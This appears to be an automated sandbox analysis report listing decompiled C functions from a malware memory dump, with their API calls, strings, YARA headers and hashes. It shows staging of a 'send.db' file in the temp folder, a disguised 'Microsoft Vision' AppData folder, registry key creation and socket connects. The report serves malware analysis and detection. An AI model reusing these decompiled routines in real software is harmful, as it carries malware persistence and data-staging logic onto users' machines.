                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00410F61() {
                                  				intOrPtr _v6;
                                  				signed int _v12;
                                  				intOrPtr _v272;
                                  				intOrPtr _v280;
                                  				intOrPtr _v284;
                                  				char _v288;
                                  				struct HINSTANCE__* _t33;
                                  				intOrPtr _t35;
                                  				intOrPtr _t38;
                                  				intOrPtr _t53;
                                  				intOrPtr _t62;
                                  				_Unknown_base(*)()* _t69;
                                  				void* _t71;
                                  
                                  				_v288 = 0x11c;
                                  				_t33 = LoadLibraryA("ntdll.dll");
                                  				if(_t33 == 0) {
                                  					L3:
                                  					_t71 = 2;
                                  					if(_v272 != _t71) {
                                  						goto L43;
                                  					} else {
                                  						_t35 = _v6;
                                  						if(_t35 != 1) {
                                  							if(_t35 == 2 || _t35 == 3) {
                                  								if(_v284 != 5) {
                                  									if(_v284 != 6) {
                                  										if(_v284 != 0xa || _v280 != 0) {
                                  											goto L43;
                                  										} else {
                                  											return (_v12 & 0x0000ffff) + 0x2710;
                                  										}
                                  									} else {
                                  										_t38 = _v280;
                                  										if(_t38 != 0) {
                                  											if(_t38 != 1) {
                                  												if(_t38 != _t71) {
                                  													if(_t38 != 3) {
                                  														goto L43;
                                  													} else {
                                  														return (_v12 & 0x0000ffff) + 0x189c;
                                  													}
                                  												} else {
                                  													return (_v12 & 0x0000ffff) + 0x1838;
                                  												}
                                  											} else {
                                  												return (_v12 & 0x0000ffff) + 0x17d4;
                                  											}
                                  										} else {
                                  											return (_v12 & 0x0000ffff) + 0x1770;
                                  										}
                                  									}
                                  								} else {
                                  									if(_v280 != 1) {
                                  										if(_v280 != _t71) {
                                  											goto L43;
                                  										} else {
                                  											return (_v12 & 0x0000ffff) + 0x1450;
                                  										}
                                  									} else {
                                  										return (_v12 & 0x0000ffff) + 0x13ec;
                                  									}
                                  								}
                                  							} else {
                                  								goto L43;
                                  							}
                                  						} else {
                                  							if(_v284 != 5) {
                                  								if(_v284 != 6) {
                                  									if(_v284 != 0xa || _v280 != 0) {
                                  										goto L43;
                                  									} else {
                                  										return (_v12 & 0x0000ffff) + 0x3e8;
                                  									}
                                  								} else {
                                  									_t53 = _v280;
                                  									if(_t53 != 0) {
                                  										if(_t53 != 1) {
                                  											if(_t53 != _t71) {
                                  												if(_t53 != 3) {
                                  													goto L43;
                                  												} else {
                                  													return (_v12 & 0x0000ffff) + 0x276;
                                  												}
                                  											} else {
                                  												return (_v12 & 0x0000ffff) + 0x26c;
                                  											}
                                  										} else {
                                  											return (_v12 & 0x0000ffff) + 0x262;
                                  										}
                                  									} else {
                                  										return (_v12 & 0x0000ffff) + 0x258;
                                  									}
                                  								}
                                  							} else {
                                  								_t62 = _v280;
                                  								if(_t62 != 0) {
                                  									if(_t62 != 1) {
                                  										if(_t62 != _t71) {
                                  											goto L43;
                                  										} else {
                                  											return (_v12 & 0x0000ffff) + 0x208;
                                  										}
                                  									} else {
                                  										return (_v12 & 0x0000ffff) + 0x1fe;
                                  									}
                                  								} else {
                                  									return (_v12 & 0x0000ffff) + 0x1f4;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_t69 = GetProcAddress(_t33, "RtlGetVersion");
                                  					if(_t69 == 0) {
                                  						L43:
                                  						return 0;
                                  					} else {
                                  						 *_t69( &_v288);
                                  						goto L3;
                                  					}
                                  				}
                                  			}

                                  0x00410f6f
                                  0x00410f79
                                  0x00410f81
                                  0x00410fa0
                                  0x00410fa2
                                  0x00410fa9
                                  0x00000000
                                  0x00410faf
                                  0x00410faf
                                  0x00410fb4
                                  0x00411073
                                  0x00411084
                                  0x004110b4
                                  0x00411101
                                  0x00000000
                                  0x0041110c
                                  0x00411116
                                  0x00411116
                                  0x004110b6
                                  0x004110b6
                                  0x004110be
                                  0x004110ce
                                  0x004110dd
                                  0x004110ed
                                  0x00000000
                                  0x004110ef
                                  0x004110f9
                                  0x004110f9
                                  0x004110df
                                  0x004110e9
                                  0x004110e9
                                  0x004110d0
                                  0x004110da
                                  0x004110da
                                  0x004110c0
                                  0x004110ca
                                  0x004110ca
                                  0x004110be
                                  0x00411086
                                  0x0041108d
                                  0x004110a0
                                  0x00000000
                                  0x004110a2
                                  0x004110ac
                                  0x004110ac
                                  0x0041108f
                                  0x00411099
                                  0x00411099
                                  0x0041108d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00410fba
                                  0x00410fc1
                                  0x00411002
                                  0x00411053
                                  0x00000000
                                  0x00411066
                                  0x00411070
                                  0x00411070
                                  0x00411004
                                  0x00411004
                                  0x0041100c
                                  0x0041101c
                                  0x0041102b
                                  0x0041103b
                                  0x00000000
                                  0x00411041
                                  0x0041104b
                                  0x0041104b
                                  0x0041102d
                                  0x00411037
                                  0x00411037
                                  0x0041101e
                                  0x00411028
                                  0x00411028
                                  0x0041100e
                                  0x00411018
                                  0x00411018
                                  0x0041100c
                                  0x00410fc3
                                  0x00410fc3
                                  0x00410fcb
                                  0x00410fdb
                                  0x00410fea
                                  0x00000000
                                  0x00410ff0
                                  0x00410ffa
                                  0x00410ffa
                                  0x00410fdd
                                  0x00410fe7
                                  0x00410fe7
                                  0x00410fcd
                                  0x00410fd7
                                  0x00410fd7
                                  0x00410fcb
                                  0x00410fc1
                                  0x00410fb4
                                  0x00410f83
                                  0x00410f89
                                  0x00410f91
                                  0x00411117
                                  0x0041111a
                                  0x00410f97
                                  0x00410f9e
                                  0x00000000
                                  0x00410f9e
                                  0x00410f91

                                  APIs
                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 2574300362-1489217083
                                  • Opcode ID: 0b4d11267f930e399cf0cd0a18d96ed91b6d59d4babc8823783d36d27fe86c1a
                                  • Instruction ID: 559b4bd9e640983aade5312b2b5afba222edb0c69bc3aa9439dd4f75701b01ff
                                  • Opcode Fuzzy Hash: 0b4d11267f930e399cf0cd0a18d96ed91b6d59d4babc8823783d36d27fe86c1a
                                  • Instruction Fuzzy Hash: 16413830E0016CAADF248B55DC473FEB6B49B1A74DF0004E6E745E1691E27CCEC5CA58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E004152FD(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
                                  				char _v8;
                                  				signed int _v28;
                                  				char _v32;
                                  				short _v2080;
                                  				void* _t42;
                                  				void* _t47;
                                  
                                  				_t42 = __edx;
                                  				 *((intOrPtr*)(__ebx + 0x46183c1)) =  *((intOrPtr*)(__ebx + 0x46183c1)) + __ecx;
                                  				_t47 = __ecx;
                                  				E00401052( &_v2080, 0, 0x400);
                                  				GetTempPathW(0x400,  &_v2080);
                                  				lstrcatW( &_v2080, L"send.db");
                                  				_t48 = _t47 + 4;
                                  				E00403549(_t47 + 4, E004036F7( &_v8,  &_v2080));
                                  				E00405FEB(_v8);
                                  				_t12 =  &_v28;
                                  				_v28 = _v28 & 0x00000000;
                                  				asm("xorps xmm0, xmm0");
                                  				_v32 = 0x35;
                                  				asm("movups [ebp-0x14], xmm0");
                                  				E0040378B(E00403873( &_v32, _t42, _t48),  *_t12, _a4);
                                  				E00403777( &_v32);
                                  				return _a4;
                                  			}

                                  0x004152fd
                                  0x004152ff
                                  0x00415321
                                  0x00415323
                                  0x00415333
                                  0x00415345
                                  0x00415351
                                  0x00415360
                                  0x00415368
                                  0x00415370
                                  0x00415370
                                  0x00415377
                                  0x0041537a
                                  0x00415382
                                  0x0041538d
                                  0x00415395
                                  0x004153a0

                                  APIs
                                  • GetTempPathW.KERNEL32(00000400,?), ref: 00415333
                                  • lstrcatW.KERNEL32 ref: 00415345
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                  • String ID: 5$send.db
                                  • API String ID: 891666058-2022884741
                                  • Opcode ID: 4fb5218cdf70102b7336957f834fab734f9ae27b016b5c812372c3844ad99268
                                  • Instruction ID: d0947e770b90053afdf585e4db67557909fa3e1f37a5b6bb773202aecca51e71
                                  • Opcode Fuzzy Hash: 4fb5218cdf70102b7336957f834fab734f9ae27b016b5c812372c3844ad99268
                                  • Instruction Fuzzy Hash: 59115E71D40119ABCB10EBA1DC46FEE7BBCAF50349F00807AB405B6191EB789B468BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E00415307(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                  				char _v8;
                                  				signed int _v28;
                                  				char _v32;
                                  				short _v2080;
                                  				void* _t35;
                                  				void* _t37;
                                  
                                  				_t35 = __edx;
                                  				_t37 = __ecx;
                                  				E00401052( &_v2080, 0, 0x400);
                                  				GetTempPathW(0x400,  &_v2080);
                                  				lstrcatW( &_v2080, L"send.db");
                                  				_t38 = _t37 + 4;
                                  				E00403549(_t37 + 4, E004036F7( &_v8,  &_v2080));
                                  				E00405FEB(_v8);
                                  				_t8 =  &_v28;
                                  				_v28 = _v28 & 0x00000000;
                                  				asm("xorps xmm0, xmm0");
                                  				_v32 = 0x35;
                                  				asm("movups [ebp-0x14], xmm0");
                                  				E0040378B(E00403873( &_v32, _t35, _t38),  *_t8, _a4);
                                  				E00403777( &_v32);
                                  				return _a4;
                                  			}

                                  0x00415307
                                  0x00415321
                                  0x00415323
                                  0x00415333
                                  0x00415345
                                  0x00415351
                                  0x00415360
                                  0x00415368
                                  0x00415370
                                  0x00415370
                                  0x00415377
                                  0x0041537a
                                  0x00415382
                                  0x0041538d
                                  0x00415395
                                  0x004153a0

                                  APIs
                                  • GetTempPathW.KERNEL32(00000400,?), ref: 00415333
                                  • lstrcatW.KERNEL32 ref: 00415345
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                  • String ID: 5$send.db
                                  • API String ID: 891666058-2022884741
                                  • Opcode ID: 58727b8c4540086e507ea86442bc3ba18e17fd027ee75a42045624fd60953c6a
                                  • Instruction ID: b9129dd2177f5d91cb3c2605560a9b03bc3764b0432bab46560860ad6b854e10
                                  • Opcode Fuzzy Hash: 58727b8c4540086e507ea86442bc3ba18e17fd027ee75a42045624fd60953c6a
                                  • Instruction Fuzzy Hash: E1013C71D40119ABCB10EB61DC46FEE7BBCAF54309F00807AB505B2191EB789B468BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E0041579A(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
                                  				char _v8;
                                  				char _v28;
                                  				char _v32;
                                  				short _v552;
                                  				void* _t41;
                                  				void* _t42;
                                  				void* _t45;
                                  
                                  				_t41 = __edx;
                                  				 *((intOrPtr*)(__ebx - 0x74aa3c3f)) =  *((intOrPtr*)(__ebx - 0x74aa3c3f)) + __ecx + 1;
                                  				_v8 = 0;
                                  				E00401052( &_v552, 0, 0x208);
                                  				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552, _t42, _t45);
                                  				lstrcatW( &_v552, L"\\Microsoft Vision\\");
                                  				E0040357C( &_v8, _t41, 0,  &_v552);
                                  				_v32 = 0x3b;
                                  				asm("xorps xmm0, xmm0");
                                  				_v28 = 0;
                                  				asm("movups [ebp-0x14], xmm0");
                                  				E0040378B(E00403873( &_v32, _t41,  &_v8), 0, _a4);
                                  				E00403777( &_v32);
                                  				E00405FEB(_v8);
                                  				return _a4;
                                  			}

                                  0x0041579a
                                  0x0041579d
                                  0x004157ba
                                  0x004157bd
                                  0x004157d1
                                  0x004157e3
                                  0x004157f3
                                  0x004157fe
                                  0x00415805
                                  0x00415808
                                  0x0041580f
                                  0x0041581a
                                  0x00415822
                                  0x0041582a
                                  0x00415834

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004157D1
                                  • lstrcatW.KERNEL32 ref: 004157E3
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FolderFreePathVirtuallstrcat
                                  • String ID: ;$\Microsoft Vision\
                                  • API String ID: 1529938272-253167065
                                  • Opcode ID: e1f543ee66d075d9957e2bbf340ec3783308addc8351dc4c6c8c35eeb8be1d21
                                  • Instruction ID: bab513efa4ed7bf9b340fce4efe21c66aceecf9db260b5e240e0963f2cc01e74
                                  • Opcode Fuzzy Hash: e1f543ee66d075d9957e2bbf340ec3783308addc8351dc4c6c8c35eeb8be1d21
                                  • Instruction Fuzzy Hash: 5F115EB1C40119AACB10EFA1DD49EEFBFB8EF19344F1041AAF505B2091DB38AB45CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 66%
                                  			E004157A1(void* __ecx, void* __edx, intOrPtr _a4) {
                                  				char _v8;
                                  				char _v28;
                                  				char _v32;
                                  				short _v552;
                                  				void* _t34;
                                  
                                  				_t34 = __edx;
                                  				_v8 = 0;
                                  				E00401052( &_v552, 0, 0x208);
                                  				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552);
                                  				lstrcatW( &_v552, L"\\Microsoft Vision\\");
                                  				E0040357C( &_v8, _t34, 0,  &_v552);
                                  				_v32 = 0x3b;
                                  				asm("xorps xmm0, xmm0");
                                  				_v28 = 0;
                                  				asm("movups [ebp-0x14], xmm0");
                                  				E0040378B(E00403873( &_v32, _t34,  &_v8), 0, _a4);
                                  				E00403777( &_v32);
                                  				E00405FEB(_v8);
                                  				return _a4;
                                  			}

                                  0x004157a1
                                  0x004157ba
                                  0x004157bd
                                  0x004157d1
                                  0x004157e3
                                  0x004157f3
                                  0x004157fe
                                  0x00415805
                                  0x00415808
                                  0x0041580f
                                  0x0041581a
                                  0x00415822
                                  0x0041582a
                                  0x00415834

                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004157D1
                                  • lstrcatW.KERNEL32 ref: 004157E3
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FolderFreePathVirtuallstrcat
                                  • String ID: ;$\Microsoft Vision\
                                  • API String ID: 1529938272-253167065
                                  • Opcode ID: ae987deb636bde6e6a9704bff2257c3adb5749e056cb561f849882f6733134c3
                                  • Instruction ID: 19a63838f8e1e6d763b3ca3dd868f266859aef75a557a0161fa2b0bf50ee1775
                                  • Opcode Fuzzy Hash: ae987deb636bde6e6a9704bff2257c3adb5749e056cb561f849882f6733134c3
                                  • Instruction Fuzzy Hash: D70109B1C40119AACB10EBA1DD49EEFBBBCAF18344F10416AB505A2191EB78AB45CBD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412F0D(void* __ecx) {
                                  				char _v8;
                                  				short* _t10;
                                  
                                  				_t1 =  &_v8; // 0x41306c
                                  				_t10 = L"SOFTWARE\\Microsoft\\Control Panel\\";
                                  				if(RegOpenKeyExW(0x80000001, _t10, 0, 0xf003f, _t1) == 2) {
                                  					_t2 =  &_v8; // 0x41306c
                                  					RegCreateKeyExW(0x80000001, _t10, 0, 0, 0, 0xf003f, 0, _t2, 0);
                                  				}
                                  				_t3 =  &_v8; // 0x41306c
                                  				return  *_t3;
                                  			}

                                  0x00412f14
                                  0x00412f20
                                  0x00412f35
                                  0x00412f38
                                  0x00412f47
                                  0x00412f47
                                  0x00412f4d
                                  0x00412f54

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,l0A,00000000,767182ED,766F13E0,?,?,0041306C), ref: 00412F2C
                                  • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,l0A,00000000,?,?,0041306C), ref: 00412F47
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateOpen
                                  • String ID: SOFTWARE\Microsoft\Control Panel\$l0A
                                  • API String ID: 436179556-2156092134
                                  • Opcode ID: 41a7bdf9e1d41e79d9f51368af4def5ee5f15e3bf49717f06ad0d9e1a1792ddf
                                  • Instruction ID: 1f16a589a04c443d12bfafe5dd9e5f2cbd84612a4648573e2ca0ed0d46f4e2df
                                  • Opcode Fuzzy Hash: 41a7bdf9e1d41e79d9f51368af4def5ee5f15e3bf49717f06ad0d9e1a1792ddf
                                  • Instruction Fuzzy Hash: 71E0ED76505128FE972086969D88DEB7EBCDB8A7F4F204066FA09E2101D1619E40D5F4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004133B6(CHAR* __ecx, void* __edx, long _a4) {
                                  				long _v8;
                                  				int _t4;
                                  				void* _t13;
                                  				void* _t16;
                                  
                                  				_push(__ecx);
                                  				_t13 = __edx;
                                  				_v8 = 0;
                                  				_t4 = CreateFileA(__ecx, 0x40000000, 0, 0, 2, 0, 0);
                                  				_t16 = _t4;
                                  				if(_t16 != 0xffffffff) {
                                  					WriteFile(_t16, _t13, _a4,  &_v8, 0);
                                  					_t4 = CloseHandle(_t16);
                                  				}
                                  				return _t4;
                                  			}

                                  0x004133b9
                                  0x004133bf
                                  0x004133cd
                                  0x004133d0
                                  0x004133d6
                                  0x004133db
                                  0x004133e7
                                  0x004133ee
                                  0x004133ee
                                  0x004133f8

                                  APIs
                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004133D0
                                  • WriteFile.KERNEL32(00000000,?,74A313FB,00000000,00000000), ref: 004133E7
                                  • CloseHandle.KERNEL32(00000000), ref: 004133EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleWrite
                                  • String ID: :start
                                  • API String ID: 1065093856-1299720186
                                  • Opcode ID: 3d2162933828df349b03da93c148e200b4ff5639908ee332fc5800b7b2fee1ec
                                  • Instruction ID: 7381dbcee1bd032b03ad7134698835e658c032dc0f213ba1ed2ce9562faf62e4
                                  • Opcode Fuzzy Hash: 3d2162933828df349b03da93c148e200b4ff5639908ee332fc5800b7b2fee1ec
                                  • Instruction Fuzzy Hash: 01E092B2105218BFE3111B99AC89DEB7A7CDB893B9F108175FA25A2190D6304E0146B8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E004109ED() {
                                  				intOrPtr _v6;
                                  				char _v288;
                                  				struct HINSTANCE__* _t4;
                                  				intOrPtr _t5;
                                  				_Unknown_base(*)()* _t9;
                                  
                                  				_v288 = 0x11c;
                                  				_t4 = LoadLibraryA("ntdll.dll");
                                  				if(_t4 == 0) {
                                  					L3:
                                  					_t5 = _v6;
                                  					if(_t5 == 2 || _t5 == 3) {
                                  						return 1;
                                  					} else {
                                  						goto L5;
                                  					}
                                  				} else {
                                  					_t9 = GetProcAddress(_t4, "RtlGetVersion");
                                  					if(_t9 == 0) {
                                  						L5:
                                  						return 0;
                                  					} else {
                                  						 *_t9( &_v288);
                                  						goto L3;
                                  					}
                                  				}
                                  			}


                                  APIs
                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410A05
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410A15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 2574300362-1489217083
                                  • Opcode ID: 689f10ae6fce4d2fbcb04405c68690ba6ec8dc2e0aa7fc0cba4dbc559f6b806c
                                  • Instruction ID: 1834724eec8d6658835532cdcab9f2cbecedca635d1db10f1c6d2903e3c751bb
                                  • Opcode Fuzzy Hash: 689f10ae6fce4d2fbcb04405c68690ba6ec8dc2e0aa7fc0cba4dbc559f6b806c
                                  • Instruction Fuzzy Hash: 5AE0923178034856CB385B745D1BBDB7BE85F12745F4444A5E182E1280EAB8C9C2CA98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00410A3C() {
                                  				intOrPtr _v272;
                                  				intOrPtr _v284;
                                  				char _v288;
                                  				struct HINSTANCE__* _t5;
                                  				_Unknown_base(*)()* _t8;
                                  
                                  				_v288 = 0x11c;
                                  				_t5 = LoadLibraryA("ntdll.dll");
                                  				if(_t5 == 0) {
                                  					L3:
                                  					if(_v272 != 2) {
                                  						goto L5;
                                  					} else {
                                  						return _v284;
                                  					}
                                  				} else {
                                  					_t8 = GetProcAddress(_t5, "RtlGetVersion");
                                  					if(_t8 == 0) {
                                  						L5:
                                  						return 0;
                                  					} else {
                                  						 *_t8( &_v288);
                                  						goto L3;
                                  					}
                                  				}
                                  			}


                                  APIs
                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410A54
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410A64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 2574300362-1489217083
                                  • Opcode ID: 83fdeb69c615f76a33d2da629a34f9320cc4150906f67b16e4d4081adeff4d7f
                                  • Instruction ID: 148d00e3e7ffb053b7c10c9a99ab11a5aecab5e32aa73cb5a336ee4092301f00
                                  • Opcode Fuzzy Hash: 83fdeb69c615f76a33d2da629a34f9320cc4150906f67b16e4d4081adeff4d7f
                                  • Instruction Fuzzy Hash: 43E0123068031C56CB349B71AC0AADB77B45B12745F4085E5E245E2180EAB8CDC68FD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 40%
                                  			E004121DC(intOrPtr* __ecx) {
                                  				signed int _v8;
                                  				_Unknown_base(*)()* _t6;
                                  				intOrPtr* _t12;
                                  
                                  				_push(__ecx);
                                  				_v8 = _v8 & 0x00000000;
                                  				_t12 = __ecx;
                                  				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                  				if(_t6 != 0) {
                                  					 *_t6( *_t12,  &_v8);
                                  				}
                                  				return _v8;
                                  			}


                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 004121F1
                                  • GetProcAddress.KERNEL32(00000000), ref: 004121F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: IsWow64Process$kernel32
                                  • API String ID: 1646373207-3789238822
                                  • Opcode ID: cb2be5f3c5e82971b4ce5ae4e71650c09a6451caba81f111521282c3630b6e13
                                  • Instruction ID: 98e0a5f9caf74d9bea286be05565737d668b157ad2b0005c06096195e846ebc9
                                  • Opcode Fuzzy Hash: cb2be5f3c5e82971b4ce5ae4e71650c09a6451caba81f111521282c3630b6e13
                                  • Instruction Fuzzy Hash: 86E08C32600204FBDB14DBA0EC0AFDE7BB8EB08350B2005A9B501E2050DBB9EE00D698
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0040D01D(signed int* __ecx, intOrPtr _a4) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				void* _t22;
                                  				void* _t23;
                                  				void* _t33;
                                  				struct _CRITICAL_SECTION* _t43;
                                  				signed int* _t59;
                                  				intOrPtr _t62;
                                  				void* _t66;
                                  
                                  				_t45 = __ecx;
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				_t59 = __ecx;
                                  				_t43 = __ecx + 0x3d8;
                                  				EnterCriticalSection(_t43);
                                  				_t67 = _t59[0x7b];
                                  				_t62 = _a4;
                                  				if(_t59[0x7b] != 0) {
                                  					L2:
                                  					_t69 = _t59[3];
                                  					if(_t59[3] != 0) {
                                  						L5:
                                  						_t63 =  &(_t59[0xf1]);
                                  						_t22 = E004021ED( &(_t59[0xf1]), 0);
                                  						__eflags = _t22;
                                  						if(_t22 == 0) {
                                  							E00401F98(_t63);
                                  						}
                                  						_t23 = E004021ED( &(_t59[0xf3]), 0);
                                  						__eflags = _t23;
                                  						if(_t23 == 0) {
                                  							E00401F98( &(_t59[0xf3]));
                                  						}
                                  						_v12 = _t59[4];
                                  						_v8 = _t59[0x7c];
                                  						E00401F6D(_t63, E0040CF43,  &_v12);
                                  						E00401F6D( &(_t59[0xf3]), E0040CFB0,  &_v12);
                                  						 *_t59 = 1;
                                  						LeaveCriticalSection(_t43);
                                  						E004021ED( &(_t59[0xf1]), 0xffffffff);
                                  						E004021ED( &(_t59[0xf3]), 0xffffffff);
                                  						EnterCriticalSection(_t43);
                                  						 *_t59 =  *_t59 & 0x00000000;
                                  						LeaveCriticalSection(_t43);
                                  						E0040D1C8(_t59);
                                  						_t33 = 0;
                                  						__eflags = 0;
                                  					} else {
                                  						E00403507(_t66, _t62);
                                  						if(E0040594B( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
                                  							goto L5;
                                  						} else {
                                  							goto L4;
                                  						}
                                  					}
                                  				} else {
                                  					E00403507(_t66, _t62 + 8);
                                  					if(E0040594B( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
                                  						L4:
                                  						LeaveCriticalSection(_t43);
                                  						_t33 = 1;
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  				return _t33;
                                  			}


                                  APIs
                                  • EnterCriticalSection.KERNEL32(?), ref: 0040D02E
                                  • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0040D07D
                                    • Part of subcall function 00403507: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00402BD2,?,?,00000000,exit,00000000,start), ref: 0040352C
                                    • Part of subcall function 0040594B: getaddrinfo.WS2_32(74A313FB,00000000,00404FB9,00000000), ref: 00405998
                                    • Part of subcall function 0040594B: socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                    • Part of subcall function 0040594B: htons.WS2_32(00000000), ref: 004059D5
                                    • Part of subcall function 0040594B: freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                    • Part of subcall function 0040594B: connect.WS2_32(?,?,00000010), ref: 004059F1
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040D101
                                  • EnterCriticalSection.KERNEL32(?), ref: 0040D11E
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040D128
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                  • String ID:
                                  • API String ID: 4195813003-0
                                  • Opcode ID: 41f9955962fd48e9ea245ec66b04e5d3ca09e58cb9f6d5fe03a8e1ac849ee31d
